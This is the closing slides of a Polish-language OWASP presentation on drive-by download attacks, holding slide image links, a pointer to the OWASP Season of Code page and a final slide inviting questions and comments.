![Page 55: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/55.jpg)
OWASP
Co na to OWASP?
http://www.owasp.org/index.php/Category:OWASP_Season_of_Code
![Page 56: Ataki drive-by download](https://reader036.vdocument.in/reader036/viewer/2022062322/56814930550346895db66e65/html5/thumbnails/56.jpg)
OWASP
Pytania/uwagi/sugestie/opinie
?